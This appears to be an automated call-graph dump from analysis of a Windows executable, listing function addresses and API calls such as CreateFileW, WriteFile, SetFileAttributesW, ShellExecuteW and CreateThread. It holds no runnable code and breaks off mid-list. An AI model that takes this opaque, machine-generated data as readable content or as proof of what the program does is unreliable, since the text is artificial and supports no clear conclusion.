401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 9044->9045 9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9543 404996 9067->9543 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9561 403e70 9074->9561 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9592 403093 9125->9592 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9626 402f6c ??2@YAPAXI 9132->9626 9632 402425 ??3@YAXPAX ??3@YAXPAX 9132->9632 9134->9131 9566 404cbc 9134->9566 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9659 403b40 9167->9659 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9633 40484d 9176->9633 9644 40408b 9176->9644 9178 4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9679 4082e9 9180->9679 9185 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9658 402425 ??3@YAXPAX ??3@YAXPAX 9182->9658 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9721 403f85 9198->9721 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9734 40786b 9219->9734 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9706 407613 9222->9706 9715 407674 9222->9715 9224->9222 9225 405d20 9226 405d65 9225->9226 9740 403e0d 9225->9740 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9744 40453e 9233->9744 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9753 4043c6 9252->9753 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9533 4048ab 9268->9533 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9758 402185 9337->9758 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9662 4083b6 9506->9662 9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 401411 2 API calls 9533->9534 9541 4048bc 9534->9541 9535 401329 2 API calls 9535->9541 9536 40494e 9537 404988 ??3@YAXPAX 9536->9537 9539 4048ab 3 API calls 9536->9539 9537->9276 9538 401429 2 API calls 9538->9541 9540 404985 9539->9540 9540->9537 9541->9535 9541->9536 9541->9538 9542 40243b lstrcmpW 9541->9542 9542->9541 9544 40661a 2 API calls 9543->9544 9545 4049af 9544->9545 9546 401f9d 19 API calls 9545->9546 9547 4049bd 9546->9547 9548 4024fc 2 API calls 9547->9548 9549 4049c7 9548->9549 9550 4049fd 9549->9550 9552 40254d ??2@YAPAXI ??3@YAXPAX 9549->9552 9551 40254d 2 API calls 9550->9551 9553 404a0a 9551->9553 9552->9549 9554 401f9d 19 API calls 9553->9554 9555 404a11 9554->9555 9556 40254d 2 API calls 9555->9556 9557 404a1b 9556->9557 9558 4073d1 21 API calls 9557->9558 9559 404a30 ??3@YAXPAX 9558->9559 9560 404a41 ctype 9559->9560 9560->9083 9562 40e8da ctype 3 API calls 9561->9562 9563 403e7e 9562->9563 9564 40e8da ctype 3 API calls 9563->9564 9565 40e943 ??3@YAXPAX 9564->9565 9565->9077 9567 40db53 2 API calls 9566->9567 9568 404ce8 9567->9568 9569 404d44 9568->9569 9571 4024fc 2 API calls 9568->9571 9570 4025ae 2 API calls 9569->9570 9572 404d4c 9570->9572 9573 404cf7 9571->9573 9574 403e86 2 API calls 9572->9574 9577 404db5 ??3@YAXPAX 9573->9577 9579 403354 86 API calls 9573->9579 9575 404d59 9574->9575 9576 403ef6 2 API calls 9575->9576 9578 404d66 9576->9578 9591 404db1 9577->9591 9580 403ef6 2 API calls 9578->9580 9581 404d1b 9579->9581 9582 404d73 9580->9582 9581->9577 9584 40db53 2 API calls 9581->9584 9583 403ef6 2 API calls 9582->9583 9585 404d80 9583->9585 9586 404d37 9584->9586 9587 40dd5f 2 API calls 9585->9587 9586->9577 9588 404d3b ??3@YAXPAX 9586->9588 9589 404d94 9587->9589 9588->9569 9589->9577 9590 404d9d ??3@YAXPAX 9589->9590 9590->9591 9591->9142 9593 4025ae 2 API calls 9592->9593 9609 4030a8 9593->9609 9594 403301 9595 403344 ??3@YAXPAX 9594->9595 9596 40334e 9595->9596 9596->9128 9596->9135 9597 401411 ??2@YAPAXI ??3@YAXPAX 9597->9609 9599 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9599->9609 9600 401362 2 API calls 9601 4030f3 ??3@YAXPAX ??3@YAXPAX 9600->9601 9602 403303 9601->9602 9601->9609 10393 4029c3 9602->10393 9606 40331c ??3@YAXPAX 9606->9596 9607 4031e5 strncmp 9608 4031d0 strncmp 9607->9608 9607->9609 9608->9607 9608->9609 9609->9594 9609->9597 9609->9599 9609->9600 9609->9602 9609->9607 9610 401362 2 API calls 9609->9610 9611 402640 2 API calls 9609->9611 9614 402640 ??2@YAPAXI ??3@YAXPAX 9609->9614 9616 4023dd lstrcmpW 9609->9616 9617 402f6c 7 API calls 9609->9617 9619 403330 9609->9619 9620 4032b2 lstrcmpW 9609->9620 9624 401329 2 API calls 9609->9624 10387 402986 9609->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9609->10392 9612 403252 ??3@YAXPAX 9610->9612 9611->9608 9613 402a69 9 API calls 9612->9613 9615 403263 lstrcmpW 9613->9615 9614->9609 9615->9609 9616->9609 9617->9609 9622 402f6c 7 API calls 9619->9622 9620->9609 9621 4032c0 lstrcmpW 9620->9621 9621->9609 9623 40333c 9622->9623 10411 402425 ??3@YAXPAX ??3@YAXPAX 9623->10411 9624->9609 9627 402f86 9626->9627 9628 402f7b 9626->9628 9630 408761 4 API calls 9627->9630 10413 402668 9628->10413 9631 402f92 9630->9631 9631->9132 9632->9132 9634 4024fc 2 API calls 9633->9634 9635 40485f 9634->9635 9636 40254d 2 API calls 9635->9636 9637 40486c 9636->9637 9638 404888 9637->9638 9639 401429 2 API calls 9637->9639 9640 40254d 2 API calls 9638->9640 9639->9637 9641 404892 9640->9641 9642 40408b 94 API calls 9641->9642 9643 40489d ??3@YAXPAX 9642->9643 9643->9176 9645 4040a2 lstrlenW 9644->9645 9646 4040ce 9644->9646 9647 401a85 4 API calls 9645->9647 9646->9176 9648 4040b8 9647->9648 9648->9645 9648->9646 9649 4040d5 9648->9649 9650 4024fc 2 API calls 9649->9650 9653 4040de 9650->9653 10418 402776 9653->10418 9654 403093 84 API calls 9655 40414c 9654->9655 9656 404156 ??3@YAXPAX ??3@YAXPAX 9655->9656 9657 40416d ??3@YAXPAX ??3@YAXPAX 9655->9657 9656->9646 9657->9646 9658->9189 9660 40661a 2 API calls 9659->9660 9661 403b48 9660->9661 9661->9178 9663 408646 9662->9663 9675 4083d5 ctype 9662->9675 9663->9184 9664 40661a 2 API calls 9664->9675 9665 40786b 23 API calls 9665->9675 9666 40243b lstrcmpW 9666->9675 9668 407674 23 API calls 9668->9675 9669 407613 23 API calls 9669->9675 9670 403b40 2 API calls 9670->9675 9671 401f9d 19 API calls 9671->9675 9672 407776 55 API calls 9672->9675 9673 403f48 4 API calls 9673->9675 9674 4073d1 21 API calls 9674->9675 9675->9663 9675->9664 9675->9665 9675->9666 9675->9668 9675->9669 9675->9670 9675->9671 9675->9672 9675->9673 9675->9674 9676 407717 25 API calls 9675->9676 9677 4073d1 21 API calls 9675->9677 10428 40744b 9675->10428 9676->9675 9678 408476 ??3@YAXPAX 9677->9678 9678->9675 9680 40243b lstrcmpW 9679->9680 9681 4082fd 9680->9681 9682 40830b 9681->9682 10432 4019f0 GetStdHandle WriteFile 9681->10432 9684 40831e 9682->9684 10433 4019f0 GetStdHandle WriteFile 9682->10433 9686 408333 9684->9686 10434 4019f0 GetStdHandle WriteFile 9684->10434 9688 408344 9686->9688 10435 4019f0 GetStdHandle WriteFile 9686->10435 9690 40243b lstrcmpW 9688->9690 9691 408351 9690->9691 9694 40835f 9691->9694 10436 4019f0 GetStdHandle WriteFile 9691->10436 9693 40243b lstrcmpW 9695 40836c 9693->9695 9694->9693 9696 40837a 9695->9696 10437 4019f0 GetStdHandle WriteFile 9695->10437 9698 40243b lstrcmpW 9696->9698 9699 408387 9698->9699 9700 408395 9699->9700 10438 4019f0 GetStdHandle WriteFile 9699->10438 9702 40243b lstrcmpW 9700->9702 9703 4083a2 9702->9703 9704 4083b2 9703->9704 10439 4019f0 GetStdHandle WriteFile 9703->10439 9704->9180 9707 407636 9706->9707 9708 407658 9707->9708 9709 40764b 9707->9709 10443 407186 9708->10443 10440 407154 9709->10440 9712 407653 9713 4073d1 21 API calls 9712->9713 9714 407671 9713->9714 9714->9222 9716 407689 9715->9716 9717 40716d 2 API calls 9716->9717 9718 407694 9717->9718 9719 4073d1 21 API calls 9718->9719 9720 4076a5 9719->9720 9720->9222 9722 401411 2 API calls 9721->9722 9723 403f96 9722->9723 9724 402535 2 API calls 9723->9724 9725 403f9f GetTempPathW 9724->9725 9726 403fb8 9725->9726 9731 403fcf 9725->9731 9727 402535 2 API calls 9726->9727 9728 403fc3 GetTempPathW 9727->9728 9728->9731 9729 402535 2 API calls 9730 403ff2 wsprintfW 9729->9730 9730->9731 9731->9729 9732 404009 GetFileAttributesW 9731->9732 9733 40402d 9731->9733 9732->9731 9732->9733 9733->9207 9735 40787e 9734->9735 10449 40719f 9735->10449 9738 4073d1 21 API calls 9739 4078b3 9738->9739 9739->9225 9741 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9740->9741 9742 403e16 9740->9742 9741->9226 9743 402c86 16 API calls 9742->9743 9743->9741 9745 40243b lstrcmpW 9744->9745 9746 40455d 9745->9746 9747 404592 9746->9747 9748 401329 2 API calls 9746->9748 9747->9277 9749 40456c 9748->9749 9750 403b7f 19 API calls 9749->9750 9751 404572 9750->9751 9751->9747 9752 401429 2 API calls 9751->9752 9752->9747 9754 4012f7 2 API calls 9753->9754 9755 4043d4 9754->9755 9756 40254d 2 API calls 9755->9756 9757 4043df 9756->9757 9757->9266 9759 4021a9 9758->9759 9760 40218e LoadLibraryA GetProcAddress 9758->9760 9759->9323 9760->9759 9762 40661a 2 API calls 9761->9762 9763 403f50 9762->9763 9764 401411 2 API calls 9763->9764 9765 403f5e 9764->9765 9765->9251 9767 404cb1 ??3@YAXPAX 9766->9767 9769 404b15 9766->9769 9770 404cb7 9767->9770 9768 404b29 GetDriveTypeW 9768->9767 9771 404b55 9768->9771 9769->9767 9769->9768 9770->9236 9772 403f85 6 API calls 9771->9772 9773 404b63 CreateFileW 9772->9773 9774 404b89 9773->9774 9775 404c7b ??3@YAXPAX ??3@YAXPAX 9773->9775 9776 401411 2 API calls 9774->9776 9775->9770 9777 404b92 9776->9777 9778 401329 2 API calls 9777->9778 9779 404b9f 9778->9779 9780 40254d 2 API calls 9779->9780 9781 404bad 9780->9781 9782 4013e2 2 API calls 9781->9782 9783 404bb9 9782->9783 9784 40254d 2 API calls 9783->9784 9785 404bc7 9784->9785 9786 40254d 2 API calls 9785->9786 9787 404bd4 9786->9787 9788 4013e2 2 API calls 9787->9788 9789 404be0 9788->9789 9790 40254d 2 API calls 9789->9790 9791 404bed 9790->9791 9792 40254d 2 API calls 9791->9792 9793 404bf6 9792->9793 9794 4013e2 2 API calls 9793->9794 9795 404c02 9794->9795 9796 40254d 2 API calls 9795->9796 9797 404c0b 9796->9797 9798 402776 3 API calls 9797->9798 9799 404c1d WriteFile ??3@YAXPAX CloseHandle 9798->9799 9800 404c4b 9799->9800 9801 404c8c 9799->9801 9800->9801 9802 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9800->9802 9803 402c86 16 API calls 9801->9803 9802->9775 9804 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9770 9814 4022b0 9805->9814 9809 401411 2 API calls 9808->9809 9810 40273a 9809->9810 9811 402772 9810->9811 9812 402535 2 API calls 9810->9812 9811->9364 9813 402757 MultiByteToWideChar 9812->9813 9813->9811 9815 4022ea 9814->9815 9816 4022be ??2@YAPAXI 9814->9816 9815->9364 9816->9815 9818 4022cf 9816->9818 9817 4022e2 ??3@YAXPAX 9817->9815 9818->9817 9818->9818 9820 401ae3 9819->9820 9821 401a97 9819->9821 9820->9373 9821->9820 9822 401abc CharUpperW CharUpperW 9821->9822 9822->9821 9823 401af3 CharUpperW CharUpperW 9822->9823 9823->9820 9824->9392 9826 403e9e 9825->9826 9827 4022b0 2 API calls 9826->9827 9828 403eac 9827->9828 9828->9406 9830 40435e 9829->9830 9831 404375 9830->9831 9832 40436a 9830->9832 9833 4025ae 2 API calls 9831->9833 9849 4025f6 9832->9849 9834 40437e 9833->9834 9836 4022b0 2 API calls 9834->9836 9838 404387 9836->9838 9837 404373 9841 403ec1 9837->9841 9838->9838 9839 4025f6 2 API calls 9838->9839 9840 4043b5 ??3@YAXPAX 9839->9840 9840->9837 9842 403ecd 9841->9842 9844 403ede 9841->9844 9843 4022b0 2 API calls 9842->9843 9843->9844 9844->9412 9846 403f06 9845->9846 9846->9846 9852 4022fc 9846->9852 9848 403f13 9848->9418 9850 4022b0 2 API calls 9849->9850 9851 402610 9850->9851 9851->9837 9853 402340 9852->9853 9854 402310 9852->9854 9853->9848 9855 4022b0 2 API calls 9854->9855 9855->9853 9857 4022fc 2 API calls 9856->9857 9858 40264a 9857->9858 9858->9428 9860 403d3d 9859->9860 9871 403c63 9860->9871 9864 403cd3 9863->9864 9865 403c63 _wtol 9864->9865 9866 403cf4 9865->9866 9866->9467 9868 403d04 9867->9868 9869 403c63 _wtol 9868->9869 9870 403d1c 9869->9870 9870->9472 9872 403c6d 9871->9872 9873 403c88 _wtol 9872->9873 9874 403cc1 9872->9874 9873->9872 9874->9461 9876 4023e8 9875->9876 9877 402411 9876->9877 9878 4023f4 lstrcmpW 9876->9878 9877->9182 9878->9876 9878->9877 9880 408679 9879->9880 9880->9509 9882 40b30d 9881->9882 9886 40dcfb 3 API calls 9882->9886 9883 40b321 9884 40b331 9883->9884 9927 40b163 9883->9927 9884->9512 9886->9883 9888 40a7fe 9887->9888 9889 40b2fc 11 API calls 9888->9889 9890 40a823 9889->9890 9891 40a845 9890->9891 9892 40a82c 9890->9892 9955 40cc59 _EH_prolog 9891->9955 9958 40a3fe 9892->9958 9904 40151e 9903->9904 9905 401329 2 API calls 9904->9905 9906 40152b 9905->9906 9907 401429 2 API calls 9906->9907 9908 401534 CreateThread 